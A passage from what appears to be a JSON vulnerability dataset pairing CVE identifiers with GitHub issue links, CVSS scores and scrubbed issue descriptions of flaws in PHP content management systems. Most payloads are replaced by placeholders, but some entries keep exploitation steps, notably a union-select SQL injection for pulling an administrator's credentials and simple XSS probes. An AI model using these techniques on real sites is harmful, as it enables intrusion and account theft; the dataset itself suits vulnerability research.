  49200. "description": "\u53cd\u5c04\u578bxss. \u60a8\u597d\uff1a APITAG APITAG FILETAG \u867d\u7136\u9879\u76ee\u4e2d\u5b58\u5728xss\u62e6\u622a\u5668 FILETAG APITAG",
  49201. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  49202. "severity": "MEDIUM",
  49203. "baseScore": 6.1,
  49204. "impactScore": 2.7,
  49205. "exploitabilityScore": 2.8
  49206. },
  49207. {
  49208. "CVE_ID": "CVE-2020-18065",
  49209. "Issue_Url_old": "https://github.com/PopojiCMS/PopojiCMS/issues/16",
  49210. "Issue_Url_new": "https://github.com/popojicms/popojicms/issues/16",
  49211. "Repo_new": "popojicms/popojicms",
  49212. "Issue_Created_At": "2019-01-06T15:52:51Z",
  49213. "description": "The APITAG NUMBERTAG has xss in URLTAG NUMBERTAG login NUMBERTAG open URLTAG NUMBERTAG edit menu FILETAG NUMBERTAG open and input exp \"> APITAG alert(\"xss\") APITAG FILETAG APITAG the id parameter",
  49214. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  49215. "severity": "MEDIUM",
  49216. "baseScore": 5.4,
  49217. "impactScore": 2.7,
  49218. "exploitabilityScore": 2.3
  49219. },
  49220. {
  49221. "CVE_ID": "CVE-2020-18066",
  49222. "Issue_Url_old": "https://github.com/94fzb/zrlog/issues/42",
  49223. "Issue_Url_new": "https://github.com/94fzb/zrlog/issues/42",
  49224. "Repo_new": "94fzb/zrlog",
  49225. "Issue_Created_At": "2019-01-08T09:46:27Z",
  49226. "description": "There is a stored XSS in the frontend which hacker can escalate of Privileges. APITAG is a stored XSS in ther front end which hack can escalate of Privileges. when we access url below: APITAG FILETAG we can see there contains a comment modul\uff0cit does't check the user input,so when we submit the comment form with the palyoad below,this stored xss will be happened. payload :\u201c> APITAG Requested data packet : ERRORTAG when the cross site script successful executed,we can see the cookie of the frontend viewr's was been stolen. FILETAG And more seriously,when the admin log in the backend and access the comment manage module,it will cause the cross site script excute which submit by APITAG after that,the cookie of the admin will be stolen,and the hacker will use the cookie to escalate of Privileges. FILETAG suggestions: APITAG the parameter in the comment form below: APITAG APITAG a global interceptor to filtered the parameter input from APITAG use the entity encode to encode the parameter,to avoid the use of label such as '<' or '>'. Hope you guy fix this flaw quickly,if you have some request,please contact me with the email below: EMAILTAG",
  49227. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  49228. "severity": "MEDIUM",
  49229. "baseScore": 6.1,
  49230. "impactScore": 2.7,
  49231. "exploitabilityScore": 2.8
  49232. },
  49233. {
  49234. "CVE_ID": "CVE-2020-18070",
  49235. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/46",
  49236. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/46",
  49237. "Repo_new": "idreamsoft/iCMS",
  49238. "Issue_Created_At": "2019-01-08T16:00:58Z",
  49239. "description": "A vulnerability that can delete any folder in the server. The APITAG method in APITAG does not filter the input content ,it can be used to delete any folder in the server. FILETAG FILETAG And there's also a small problem. When deleting the backup file, only the backup folder is deleted, and the zip file is not deleted. The database file can be downloaded directly (It's hard to get the APITAG FILETAG",
  49240. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
  49241. "severity": "CRITICAL",
  49242. "baseScore": 9.1,
  49243. "impactScore": 5.2,
  49244. "exploitabilityScore": 3.9
  49245. },
  49246. {
  49247. "CVE_ID": "CVE-2020-18084",
  49248. "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/9",
  49249. "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/9",
  49250. "Repo_new": "yzmcms/yzmcms",
  49251. "Issue_Created_At": "2019-01-25T15:40:33Z",
  49252. "description": "There is a XSS vulnerability discovered in yzmcms NUMBERTAG ss payload: \"> APITAG alert NUMBERTAG APITAG <\" POC: CODETAG Execute payload when login is successful FILETAG",
  49253. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  49254. "severity": "MEDIUM",
  49255. "baseScore": 6.1,
  49256. "impactScore": 2.7,
  49257. "exploitabilityScore": 2.8
  49258. },
  49259. {
  49260. "CVE_ID": "CVE-2020-18102",
  49261. "Issue_Url_old": "https://github.com/FantasticLBP/Hotels_Server/issues/3",
  49262. "Issue_Url_new": "https://github.com/fantasticlbp/hotels_server/issues/3",
  49263. "Repo_new": "fantasticlbp/hotels_server",
  49264. "Issue_Created_At": "2019-01-23T16:31:32Z",
  49265. "description": "XSS Vulnerability in FILETAG . In FILETAG FILETAG As you see, there are not any filtration in all \u2018echo\u2019s. Also in FILETAG , these are inserted into database without filtration FILETAG After all, we can enjoy XSS FILETAG FILETAG",
  49266. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  49267. "severity": "MEDIUM",
  49268. "baseScore": 6.1,
  49269. "impactScore": 2.7,
  49270. "exploitabilityScore": 2.8
  49271. },
  49272. {
  49273. "CVE_ID": "CVE-2020-18106",
  49274. "Issue_Url_old": "https://github.com/FeMiner/wms/issues/7",
  49275. "Issue_Url_new": "https://github.com/feminer/wms/issues/7",
  49276. "Repo_new": "feminer/wms",
  49277. "Issue_Created_At": "2019-03-13T11:23:13Z",
  49278. "description": "SQL injection in FILETAG SQL injection in FILETAG APITAG The GET parameter \"id\" is passed without filtering to SQL sentence which causes the vulnerability.",
  49279. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  49280. "severity": "CRITICAL",
  49281. "baseScore": 9.8,
  49282. "impactScore": 5.9,
  49283. "exploitabilityScore": 3.9
  49284. },
  49285. {
  49286. "CVE_ID": "CVE-2020-18121",
  49287. "Issue_Url_old": "https://github.com/Indexhibit/indexhibit/issues/17",
  49288. "Issue_Url_new": "https://github.com/indexhibit/indexhibit/issues/17",
  49289. "Repo_new": "indexhibit/indexhibit",
  49290. "Issue_Created_At": "2019-02-14T04:27:30Z",
  49291. "description": "There is a improper configuration leads to getshell. There is a improper configuration leads to getshell. poc: first,let's sign in our indexhibit CMS,then we can see this choice APITAG FILETAG so,we can modify the plugins,include php APITAG modify: FILETAG we can use knife to connect: FILETAG",
  49292. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  49293. "severity": "HIGH",
  49294. "baseScore": 8.8,
  49295. "impactScore": 5.9,
  49296. "exploitabilityScore": 2.8
  49297. },
  49298. {
  49299. "CVE_ID": "CVE-2020-18123",
  49300. "Issue_Url_old": "https://github.com/Indexhibit/indexhibit/issues/18",
  49301. "Issue_Url_new": "https://github.com/indexhibit/indexhibit/issues/18",
  49302. "Repo_new": "indexhibit/indexhibit",
  49303. "Issue_Created_At": "2019-02-16T14:04:55Z",
  49304. "description": "There is a CSRF vulnerability that can be deleted administrator account . Here is a CSRF attacks. poc: first,as we all know,when we install the website,the id of installer(inde NUMBERTAG is NUMBERTAG always means admin),so the id of inde NUMBERTAG is NUMBERTAG FILETAG ok,make id NUMBERTAG FILETAG let's refresh,we can see we have deleted the account of inde NUMBERTAG FILETAG",
  49305. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  49306. "severity": "MEDIUM",
  49307. "baseScore": 6.5,
  49308. "impactScore": 3.6,
  49309. "exploitabilityScore": 2.8
  49310. },
  49311. {
  49312. "CVE_ID": "CVE-2020-18124",
  49313. "Issue_Url_old": "https://github.com/Indexhibit/indexhibit/issues/19",
  49314. "Issue_Url_new": "https://github.com/indexhibit/indexhibit/issues/19",
  49315. "Repo_new": "indexhibit/indexhibit",
  49316. "Issue_Created_At": "2019-02-16T14:22:07Z",
  49317. "description": "There is a CSRF vulnerability that can be reset password of any account. There is a CSRF vulnerability to reset password first,let's use this account: username=test and id NUMBERTAG In fact,we all know the id NUMBERTAG and username=inde NUMBERTAG is installer,but I have deleted.) FILETAG ok,poc: FILETAG ok,we reset the password of test and log in: FILETAG note:the exp we can get password by grab the return packet.",
  49318. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N",
  49319. "severity": "MEDIUM",
  49320. "baseScore": 5.7,
  49321. "impactScore": 3.6,
  49322. "exploitabilityScore": 2.1
  49323. },
  49324. {
  49325. "CVE_ID": "CVE-2020-18125",
  49326. "Issue_Url_old": "https://github.com/Indexhibit/indexhibit/issues/20",
  49327. "Issue_Url_new": "https://github.com/indexhibit/indexhibit/issues/20",
  49328. "Repo_new": "indexhibit/indexhibit",
  49329. "Issue_Created_At": "2019-02-17T12:24:16Z",
  49330. "description": "Reflected Cross Site Scripting(XSS) PATHTAG In page PATHTAG the POST function can change the function used in PHP, the user/attacker can modify the parament and add the script which will be shown without filtering. They can use the script to steal the cookie or some things worse. Payload used: jxs=slideshow&i NUMBERTAG z= ERRORTAG Affected URL: FILETAG so,when we visit this PATHTAG and POST data: jxs=slideshow&i NUMBERTAG z= ERRORTAG The js will executes. FILETAG",
  49331. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  49332. "severity": "MEDIUM",
  49333. "baseScore": 6.1,
  49334. "impactScore": 2.7,
  49335. "exploitabilityScore": 2.8
  49336. },
  49337. {
  49338. "CVE_ID": "CVE-2020-18126",
  49339. "Issue_Url_old": "https://github.com/Indexhibit/indexhibit/issues/21",
  49340. "Issue_Url_new": "https://github.com/indexhibit/indexhibit/issues/21",
  49341. "Repo_new": "indexhibit/indexhibit",
  49342. "Issue_Created_At": "2019-02-19T21:44:56Z",
  49343. "description": "There are multiple cross site scripting (XSS) vulnerabilities in the management panel . There are two Stored XSS Vulnerabilities in the backstage We can make the Stored XSS via edit the Projects or Main poc: FILETAG FILETAG FILETAG FILETAG FILETAG",
  49344. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  49345. "severity": "MEDIUM",
  49346. "baseScore": 5.4,
  49347. "impactScore": 2.7,
  49348. "exploitabilityScore": 2.3
  49349. },
  49350. {
  49351. "CVE_ID": "CVE-2020-18127",
  49352. "Issue_Url_old": "https://github.com/Indexhibit/indexhibit/issues/22",
  49353. "Issue_Url_new": "https://github.com/indexhibit/indexhibit/issues/22",
  49354. "Repo_new": "indexhibit/indexhibit",
  49355. "Issue_Created_At": "2019-02-19T21:57:33Z",
  49356. "description": "There is a insecure permission so that we can read any file we want,include FILETAG . When we log in,we can view some css APITAG there is a insecure permission so that we can view any file. poc: URLTAG APITAG FILETAG APITAG parameter we put need Rigorous testing",
  49357. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  49358. "severity": "MEDIUM",
  49359. "baseScore": 6.5,
  49360. "impactScore": 3.6,
  49361. "exploitabilityScore": 2.8
  49362. },
  49363. {
  49364. "CVE_ID": "CVE-2020-18144",
  49365. "Issue_Url_old": "https://github.com/yundiao/ectouch/issues/1",
  49366. "Issue_Url_new": "https://github.com/yundiao/ectouch/issues/1",
  49367. "Repo_new": "yundiao/ectouch",
  49368. "Issue_Created_At": "2019-02-12T17:33:14Z",
  49369. "description": "Ectouch CMS Front end SQL Injection Vulnerability. I. Vulnerability Source Code Analysis NUMBERTAG Payload FILETAG APITAG Code payload with a URL (notice that there is a space before union): union select APITAG from ecs_admin_user order by goods_id asc In the latest version, payload will not be able to bring in SQL code without URL encoding. APITAG versions don't require URL encoding to be brought into payload execution; new versions only cause program execution errors, but can't bring in palyad NUMBERTAG ulnerability access file As can be seen from the URL request, the vulnerability entry file is: PATHTAG asynclist_list function. FILETAG $this APITAG fetch the parameter of integral_min from the URL REQUEST. APITAG bring the parameter in SQL operation NUMBERTAG APITAG function FILETAG APITAG function is located in PATHTAG controller. Using I function to get the parameters of integral_min. I function is located in PATHTAG The input parameters are obtained and filtered. FILETAG In function I, use DEFAULT_FILTER for filtering. It located in PATHTAG , and the value is htmlspecialchars. FILETAG Converted to single and double quotation marks, But payload does not need single or double quotes NUMBERTAG APITAG function Located in PATHTAG model. FILETAG There are no single or double quotation marks in the whole process. FILETAG II. Vulnerability Exploitation NUMBERTAG Special description: When accessed by a computer side browser, because of the file \u201c.htaccess\u201d at the root directory, will be denied access. Even just visiting the home page won't do. Because the file just redirects to APITAG No impact on testing and utilization. The name \".htaccess\" must be deleted or modified before it can be accessed in a computer browser. It does not affect the use of burpsuite to intercept mobile access APITAG access does not require modifying the file name). \nThis test is after modifying the \".htaccess\" file name, tested on computer NUMBERTAG testing environment Windows + firefox + apache2 + APITAG environment\uff09 APITAG NUMBERTAG Payload FILETAG A\u3001 The end of the request must keep up with two \u201c \u201d\uff08two lines \uff09;otherwise, there is no response to the request. B\u3001 union select APITAG from ecs_admin_user order by goods_id asc APITAG is a space before nuion\uff09encode with url. C\u3001 Request url: GET APITAG HTTP NUMBERTAG FILETAG APITAG return \u201cadmin\u201d and APITAG After decode with MD5 is \u201cadmin\u201d. Get the administrator's account and password.",
  49370. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  49371. "severity": "CRITICAL",
  49372. "baseScore": 9.8,
  49373. "impactScore": 5.9,
  49374. "exploitabilityScore": 3.9
  49375. },
  49376. {
  49377. "CVE_ID": "CVE-2020-18145",
  49378. "Issue_Url_old": "https://github.com/fex-team/umeditor/issues/624",
  49379. "Issue_Url_new": "https://github.com/fex-team/umeditor/issues/624",
  49380. "Repo_new": "fex-team/umeditor",
  49381. "Issue_Created_At": "2019-03-04T17:17:01Z",
  49382. "description": "I found a reflective XSS vulnerability in FILETAG . Testing environment: localhost Windows + firefox + APITAG + apache2 + APITAG I. Vulnerability analysis FILETAG FILETAG II. Exploit FILETAG url: FILETAG payload: APITAG APITAG // \"E\" in the word APITAG must be capitalized.",
  49383. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  49384. "severity": "MEDIUM",
  49385. "baseScore": 6.1,
  49386. "impactScore": 2.7,
  49387. "exploitabilityScore": 2.8
  49388. },
  49389. {
  49390. "CVE_ID": "CVE-2020-18151",
  49391. "Issue_Url_old": "https://github.com/thinkcmf/thinkcmf/issues/580",
  49392. "Issue_Url_new": "https://github.com/thinkcmf/thinkcmf/issues/580",
  49393. "Repo_new": "thinkcmf/thinkcmf",
  49394. "Issue_Created_At": "2019-03-25T10:35:44Z",
  49395. "description": "I found a CSRF vulnerability to add an administrator. When an administrator clicks on a web page that contains the following content, a new administrator is added. APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG FILETAG",
  49396. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  49397. "severity": "MEDIUM",
  49398. "baseScore": 6.5,
  49399. "impactScore": 3.6,
  49400. "exploitabilityScore": 2.8
  49401. },
  49402. {
  49403. "CVE_ID": "CVE-2020-18155",
  49404. "Issue_Url_old": "https://github.com/intelliants/subrion/issues/817",
  49405. "Issue_Url_new": "https://github.com/intelliants/subrion/issues/817",
  49406. "Repo_new": "intelliants/subrion",
  49407. "Issue_Created_At": "2019-04-03T10:24:41Z",
  49408. "description": "There is a time based sql injection if use PDO. I. Vulnerability Analysis Subrion CMS supports three ways of connecting mysql: mysql, mysqli and PDO. The default is mysqli. They are executed by three files in the PATHTAG directory. FILETAG FILETAG FILETAG If a website uses PDO connection, there will be a vulnerability. II. Vulnerability testing Using PDO connections requires modifying the file /includes/config. inc. php. Change mysqli to pdo. FILETAG In the search page: URLTAG POC and testing: APITAG FILETAG APITAG FILETAG APITAG FILETAG",
  49409. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  49410. "severity": "CRITICAL",
  49411. "baseScore": 9.8,
  49412. "impactScore": 5.9,
  49413. "exploitabilityScore": 3.9
  49414. },
  49415. {
  49416. "CVE_ID": "CVE-2020-18175",
  49417. "Issue_Url_old": "https://github.com/sword1991912/metinfo/issues/1",
  49418. "Issue_Url_new": "https://github.com/291237388/metinfo/issues/1",
  49419. "Repo_new": "291237388/metinfo",
  49420. "Issue_Created_At": "2019-02-13T02:09:52Z",
  49421. "description": "There is a SQL inject vulnerability(limited by PHP ts). Analysis Look at APITAG there is a function called APITAG ERRORTAG we can APITAG to directly into the SQL statement For convenience of debugging\uff1a FILETAG FILETAG After that. visit the url\uff1a URLTAG FILETAG as u can see\uff0c APITAG has been inserted into SQL statement Then: URLTAG FILETAG Exploit key is the only restriction (from APITAG Called by auth class) If PHP ts: APITAG FILETAG elif PHP nts: FILETAG sqlmap tamper ERRORTAG Encode script( APITAG in sqlmap tamper): ERRORTAG Then run command CODETAG FILETAG APITAG register a member with user name \"tete\" by yourself or modify the script)",
  49422. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  49423. "severity": "CRITICAL",
  49424. "baseScore": 9.8,
  49425. "impactScore": 5.9,
  49426. "exploitabilityScore": 3.9
  49427. },
  49428. {
  49429. "CVE_ID": "CVE-2020-18178",
  49430. "Issue_Url_old": "https://github.com/Neeke/HongCMS/issues/11",
  49431. "Issue_Url_new": "https://github.com/neeke/hongcms/issues/11",
  49432. "Repo_new": "neeke/hongcms",
  49433. "Issue_Created_At": "2019-02-12T05:35:19Z",
  49434. "description": "arbitrary file rewrite and read in Hongcms NUMBERTAG there is an arbitrary file read and rewrite in the backend of this cms via the link: PATHTAG when post params : APITAG FILETAG APITAG in the latest NUMBERTAG edtion, the cms try to use ajax to escape attacker to do same dangerous action like change file name etc but it can also be catched by proxy it will write your payload into any file which is writeable we create new file test.php to check this vuln: FILETAG we can access to it via link as URLTAG file name",
  49435. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  49436. "severity": "CRITICAL",
  49437. "baseScore": 9.8,
  49438. "impactScore": 5.9,
  49439. "exploitabilityScore": 3.9
  49440. },
  49441. {
  49442. "CVE_ID": "CVE-2020-18184",
  49443. "Issue_Url_old": "https://github.com/pluxml/PluXml/issues/320",
  49444. "Issue_Url_new": "https://github.com/pluxml/pluxml/issues/320",
  49445. "Repo_new": "pluxml/pluxml",
  49446. "Issue_Created_At": "2019-02-17T15:41:37Z",
  49447. "description": "An issue in the theme edit function. The theme edit function PATHTAG allows remote attackers to execute arbitrary PHP code by placing this code into a template. Poc: CODETAG FILETAG APITAG FILETAG",
  49448. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  49449. "severity": "HIGH",
  49450. "baseScore": 7.2,
  49451. "impactScore": 5.9,
  49452. "exploitabilityScore": 1.2
  49453. },
  49454. {
  49455. "CVE_ID": "CVE-2020-18185",
  49456. "Issue_Url_old": "https://github.com/pluxml/PluXml/issues/321",
  49457. "Issue_Url_new": "https://github.com/pluxml/pluxml/issues/321",
  49458. "Repo_new": "pluxml/pluxml",
  49459. "Issue_Created_At": "2019-02-18T06:12:50Z",
  49460. "description": "An issue when the application run in a linux environment. FILETAG in APITAG allows attackers to execute arbitrary PHP code by modify the configuration file in a linux environment. Source PATHTAG line NUMBERTAG ERRORTAG Poc: CODETAG then visit FILETAG FILETAG",
  49461. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  49462. "severity": "CRITICAL",
  49463. "baseScore": 9.8,
  49464. "impactScore": 5.9,
  49465. "exploitabilityScore": 3.9
  49466. },
  49467. {
  49468. "CVE_ID": "CVE-2020-18190",
  49469. "Issue_Url_old": "https://github.com/bludit/bludit/issues/978",
  49470. "Issue_Url_new": "https://github.com/bludit/bludit/issues/978",
  49471. "Repo_new": "bludit/bludit",
  49472. "Issue_Created_At": "2019-03-05T02:50:16Z",
  49473. "description": "Arbitrary File Delete Security. Hi There. I found Bludit NUMBERTAG allows remote attackers to delete arbitrary files via PATHTAG payload: ERRORTAG then the file PATHTAG will be deleted.",
  49474. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
  49475. "severity": "CRITICAL",
  49476. "baseScore": 9.1,
  49477. "impactScore": 5.2,
  49478. "exploitabilityScore": 3.9
  49479. },
  49480. {
  49481. "CVE_ID": "CVE-2020-18191",
  49482. "Issue_Url_old": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1303",
  49483. "Issue_Url_new": "https://github.com/getsimplecms/getsimplecms/issues/1303",
  49484. "Repo_new": "getsimplecms/getsimplecms",
  49485. "Issue_Created_At": "2019-03-05T08:11:53Z",
  49486. "description": "Arbitrary File Delete Security. Hi There. I found APITAG NUMBERTAG allows remote attackers to delete arbitrary files via PATHTAG payload: CODETAG then the file FILETAG will be deleted.",
  49487. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
  49488. "severity": "CRITICAL",
  49489. "baseScore": 9.1,
  49490. "impactScore": 5.2,
  49491. "exploitabilityScore": 3.9
  49492. },
  49493. {
  49494. "CVE_ID": "CVE-2020-18220",
  49495. "Issue_Url_old": "https://github.com/doramart/DoraCMS/issues/190",
  49496. "Issue_Url_new": "https://github.com/doramart/doracms/issues/190",
  49497. "Repo_new": "doramart/doracms",
  49498. "Issue_Created_At": "2019-02-19T18:17:06Z",
  49499. "description": "Hardcoded key vulnerability usage of static salt . Application uses static key when performing encryption which makes it easier for an attacker to conduct brute force password guessing. Affected URL: FILETAG const APITAG = \"doracms_\"; const MD5key = \"dora\"; export default { AES: { encrypt: (message) => {//\u52a0\u5bc6 return APITAG APITAG { mode: APITAG padding: APITAG APITAG }, Affected URL: FILETAG if APITAG { APITAG = APITAG APITAG } Solution: APITAG = function(message, password) { var salt = APITAG var key = APITAG salt NUMBERTAG ar iv = APITAG var cipher = APITAG CBC', key); APITAG iv}); APITAG APITAG var APITAG = APITAG return {cipher_text: APITAG salt: APITAG iv: APITAG } Source: URLTAG URLTAG",
  49500. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  49501. "severity": "HIGH",
  49502. "baseScore": 7.5,
  49503. "impactScore": 3.6,
  49504. "exploitabilityScore": 3.9
  49505. },
  49506. {
  49507. "CVE_ID": "CVE-2020-18221",
  49508. "Issue_Url_old": "https://github.com/typora/typora-issues/issues/2204",
  49509. "Issue_Url_new": "https://github.com/typora/typora-issues/issues/2204",
  49510. "Repo_new": "typora/typora-issues",
  49511. "Issue_Created_At": "2019-02-20T02:08:33Z",
  49512. "description": "APITAG XSS to RCE. Tested On Windows NUMBERTAG APITAG FILETAG XSS: ERRORTAG FILETAG FILETAG RCE: ERRORTAG FILETAG FILETAG",
  49513. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  49514. "severity": "MEDIUM",
  49515. "baseScore": 6.1,
  49516. "impactScore": 2.7,
  49517. "exploitabilityScore": 2.8
  49518. },
  49519. {
  49520. "CVE_ID": "CVE-2020-18229",
  49521. "Issue_Url_old": "https://github.com/PearlyNautilus/Security-Code-Review/issues/4",
  49522. "Issue_Url_new": "https://github.com/pearlynautilus/security-code-review/issues/4",
  49523. "Repo_new": "PearlyNautilus/Security-Code-Review",
  49524. "Issue_Created_At": "2019-03-08T07:49:52Z",
  49525. "description": "APITAG There are two xss vulnerabilities in APITAG NUMBERTAG FILETAG , parameter $cfg_copyright. Demo: Login in administrator panel and insert payload as follows: FILETAG Save it and you can see in data package. FILETAG Then,visit index page FILETAG view source: FILETAG NUMBERTAG FILETAG , parameter $cfg_switchshow. Demo: Login in administrator panel and insert payload as follows:(It's necessary to close site.) FILETAG Save it and you can see in data package. FILETAG Visit index page. FILETAG view source: FILETAG Fix: Filter the $cfg_copyright and $cfg_switchshow with function APITAG",
  49526. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  49527. "severity": "MEDIUM",
  49528. "baseScore": 4.8,
  49529. "impactScore": 2.7,
  49530. "exploitabilityScore": 1.7
  49531. },
  49532. {
  49533. "CVE_ID": "CVE-2020-18259",
  49534. "Issue_Url_old": "https://github.com/chilin89117/ED01-CMS/issues/1",
  49535. "Issue_Url_new": "https://github.com/chilin89117/ed01-cms/issues/1",
  49536. "Repo_new": "chilin89117/ED01-CMS",
  49537. "Issue_Created_At": "2019-06-13T01:37:59Z",
  49538. "description": "Two xss vulnerabilities NUMBERTAG There is a reflective xss on the search page FILETAG . Poc: APITAG FILETAG NUMBERTAG In the background, you can enter the stored xss by writing an APITAG poc in Posts APITAG Content or Post Title: APITAG Post status select Publish,when entering the home page,xss will be triggered. FILETAG FILETAG",
  49539. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  49540. "severity": "MEDIUM",
  49541. "baseScore": 6.1,
  49542. "impactScore": 2.7,
  49543. "exploitabilityScore": 2.8
  49544. },
  49545. {
  49546. "CVE_ID": "CVE-2020-18261",
  49547. "Issue_Url_old": "https://github.com/chilin89117/ED01-CMS/issues/2",
  49548. "Issue_Url_new": "https://github.com/chilin89117/ed01-cms/issues/2",
  49549. "Repo_new": "chilin89117/ED01-CMS",
  49550. "Issue_Created_At": "2019-06-13T02:17:19Z",
  49551. "description": "File upload APITAG can be uploaded and trigger remote command execution. When writing an article in the background\uff0cyou can upload a webshell via file upload vulnerability in the image upload. Poc: APITAG FILETAG FILETAG FILETAG",
  49552. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  49553. "severity": "CRITICAL",
  49554. "baseScore": 9.8,
  49555. "impactScore": 5.9,
  49556. "exploitabilityScore": 3.9
  49557. },
  49558. {
  49559. "CVE_ID": "CVE-2020-18262",
  49560. "Issue_Url_old": "https://github.com/chilin89117/ED01-CMS/issues/3",
  49561. "Issue_Url_new": "https://github.com/chilin89117/ed01-cms/issues/3",
  49562. "Repo_new": "chilin89117/ED01-CMS",
  49563. "Issue_Created_At": "2019-06-13T02:29:06Z",
  49564. "description": "There is a SQL injection vulnerability in the page FILETAG . When you click categories, the website interacts with the database via the FILETAG page cid parameter, where there is a SQL injection APITAG can enter the database through sqlmap. APITAG FILETAG FILETAG FILETAG FILETAG FILETAG FILETAG",
  49565. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  49566. "severity": "CRITICAL",
  49567. "baseScore": 9.8,
  49568. "impactScore": 5.9,
  49569. "exploitabilityScore": 3.9
  49570. },
  49571. {
  49572. "CVE_ID": "CVE-2020-18263",
  49573. "Issue_Url_old": "https://github.com/harshitbansal373/PHP-CMS/issues/1",
  49574. "Issue_Url_new": "https://github.com/harshitbansal373/php-cms/issues/1",
  49575. "Repo_new": "harshitbansal373/php-cms",
  49576. "Issue_Created_At": "2019-06-14T09:29:32Z",
  49577. "description": "SQL injection vulnerability in FILETAG . In APITAG a SQL injection vulnerability in APITAG parameter is transmitted using POST,you can use sqlmap to enter the database. CODETAG FILETAG FILETAG FILETAG",
  49578. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  49579. "severity": "HIGH",
  49580. "baseScore": 7.5,
  49581. "impactScore": 3.6,
  49582. "exploitabilityScore": 3.9
  49583. },
  49584. {
  49585. "CVE_ID": "CVE-2020-18265",
  49586. "Issue_Url_old": "https://github.com/github123abc123/bird/issues/1",
  49587. "Issue_Url_new": "https://github.com/github123abc123/bird/issues/1",
  49588. "Repo_new": "github123abc123/bird",
  49589. "Issue_Created_At": "2019-02-26T02:01:49Z",
  49590. "description": "One CSRF vulnerability in Simple Log NUMBERTAG An issue was discovered in Simple Log NUMBERTAG There is a CSRF vulnerability that can add Administrator Account in the ' APITAG Add Administrator Account Poc\uff1a Create account\uff1atest3 password:a NUMBERTAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  49591. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  49592. "severity": "HIGH",
  49593. "baseScore": 8.8,
  49594. "impactScore": 5.9,
  49595. "exploitabilityScore": 2.8
  49596. },
  49597. {
  49598. "CVE_ID": "CVE-2020-18268",
  49599. "Issue_Url_old": "https://github.com/zblogcn/zblogphp/issues/209",
  49600. "Issue_Url_new": "https://github.com/zblogcn/zblogphp/issues/209",
  49601. "Repo_new": "zblogcn/zblogphp",
  49602. "Issue_Created_At": "2019-02-19T07:18:24Z",
  49603. "description": "\u91cd\u5b9a\u5411\u6f0f\u6d1e. \u60a8\u597d\uff1a APITAG APITAG NUMBERTAG get\u53c2\u6570redirect\u5e76\u7528\u4f5c\u91cd\u5b9a\u5411\u7684\u8def\u5f84 FILETAG PATHTAG FILETAG",
  49604. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  49605. "severity": "MEDIUM",
  49606. "baseScore": 6.1,
  49607. "impactScore": 2.7,
  49608. "exploitabilityScore": 2.8
  49609. },
  49610. {
  49611. "CVE_ID": "CVE-2020-18268",
  49612. "Issue_Url_old": "https://github.com/zblogcn/zblogphp/issues/216",
  49613. "Issue_Url_new": "https://github.com/zblogcn/zblogphp/issues/216",
  49614. "Repo_new": "zblogcn/zblogphp",
  49615. "Issue_Created_At": "2019-04-04T06:05:11Z",
